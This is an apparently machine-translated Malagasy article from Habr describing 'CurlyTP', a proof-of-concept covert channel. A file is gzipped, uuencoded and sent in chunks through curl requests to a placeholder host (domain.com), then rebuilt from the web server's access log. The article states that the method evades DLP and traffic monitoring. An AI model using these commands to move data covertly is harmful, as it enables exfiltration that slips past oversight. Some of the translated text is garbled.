Araka ny famaritan'ny Wikipedia, ny fitetezana maty dia fitaovana fikomiana izay entina mifanakalo vaovao na zavatra sasany eo amin'ny olona mampiasa toerana miafina. Ny hevitra dia hoe tsy mihaona mihitsy ny olona - fa mbola mifanakalo vaovao izy ireo mba hitazonana ny fiarovana amin'ny asa.

Tsy tokony hisarika ny saina ny toerana fiafenana. Noho izany, amin'ny tontolo ivelan'ny aterineto dia matetika izy ireo no mampiasa zavatra malina: biriky mivelatra eo amin'ny rindrina, boky famakiam-boky, na lavaka ao anaty hazo.

Betsaka ny fitaovana fanafenana sy fanafenana anarana ao amin'ny Internet, fa ny tena zava-misy amin'ny fampiasana ireo fitaovana ireo dia manintona ny saina. Ankoatra izany, mety ho voasakana izy ireo eo amin'ny sehatry ny orinasa na ny governemanta. Ny hatao?

Ny mpamorona Ryan Flowers dia nanolotra safidy mahaliana - ampiasao ny mpizara tranonkala rehetra ho toerana fiafenana. Raha mieritreritra an'izany ianao, inona no ataon'ny mpizara tranonkala? Mandray fangatahana, mamoaka rakitra ary manoratra diary. Ary mitanisa ny fangatahana rehetra, na dia ireo tsy mety aza!

Hita fa ny mpizara tranonkala rehetra dia ahafahanao mitahiry saika ny hafatra rehetra ao anaty log. Nanontany tena i Flowers ny fomba ampiasana an'io.

Manolotra ity safidy ity izy:

1. Makà rakitra lahatsoratra (hafatra miafina) ary kajy ny hash (md5sum).
2. Ampidirintsika (gzip+uuencode).
3. Manoratra amin'ny log izahay mampiasa fangatahana minia diso amin'ny mpizara.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

Raha te hamaky rakitra iray dia mila manao ireto hetsika ireto ianao amin'ny filaharan'ny mifamadika: decode sy unzip ilay rakitra, jereo ny hash (azo ampitaina amin'ny fantsona misokatra ny hash).

Soloina amin'ny =+=mba tsy hisy toerana ao amin'ny adiresy. Ny programa, izay antsoin'ny mpanoratra hoe CurlyTP, dia mampiasa coding base64, toy ny fametahana mailaka. Ny fangatahana dia atao amin'ny teny fanalahidy ?transfer?mba ho hitan'ny mpandray azy mora foana ao anaty diary.

Inona no hitantsika ao amin'ny diary amin'ity tranga ity?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

Araka ny efa voalaza, mba hahazoana hafatra miafina dia mila manao ny hetsika amin'ny filaharana mivadika:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

Mora mandeha ho azy ny dingana. Md5sum mifanandrify, ary ny votoatin'ny rakitra dia manamafy fa voadika tsara ny zava-drehetra.

Ny fomba dia tena tsotra. "Ny tanjon'ity fanazaran-tena ity dia ny hanaporofoana fotsiny fa azo afindra amin'ny alàlan'ny fangatahana tranonkala tsy manan-tsiny ny rakitra, ary miasa amin'ny mpizara tranonkala misy diary soratra tsotra. Amin'ny ankapobeny, toerana fiafenana ny mpizara tranonkala rehetra!” hoy ny nosoratan'i Flowers.

Mazava ho azy fa ny fomba dia tsy miasa raha tsy mahazo miditra amin'ny logs server ny mpandray. Saingy ny fidirana toy izany dia omen'ny mpampiantrano maro, ohatra.

Ahoana ny fampiasana azy?

Nilaza i Ryan Flowers fa tsy manam-pahaizana momba ny fiarovana ny fampahalalam-baovao izy ary tsy hanangona lisitr'ireo azo ampiasaina amin'ny CurlyTP. Ho azy dia porofon'ny hevitra fotsiny fa azo ampiasaina amin'ny fomba tsy mahazatra ireo fitaovana mahazatra hitantsika isan'andro.

Raha ny marina, ity fomba ity dia manana tombony maromaro amin'ny mpizara hafa "manafina" toa Digital Dead Drop na PirateBox: tsy mitaky fanamafisam-peo manokana eo amin'ny lafin'ny mpizara na protocols manokana - ary tsy hiteraka ahiahy eo amin'ireo manara-maso ny fifamoivoizana. Tsy azo inoana fa ny rafitra SORM na DLP dia hijery URL ho an'ny rakitra lahatsoratra voaporitra.

Io no iray amin'ireo fomba fampitana hafatra amin'ny alàlan'ny rakitra serivisy. Azonao atao ny mahatsiaro ny fomba nipetrahan'ny orinasa efa mandroso sasany Jobs developer amin'ny lohatenin'ny HTTP na ao amin'ny kaody pejy HTML.

Ny hevitra dia ny mpamorona tranonkala ihany no hahita an'io atody Paska io, satria ny olon-tsotra iray dia tsy mijery ny lohapejy na kaody HTML.

Source: www.habr.com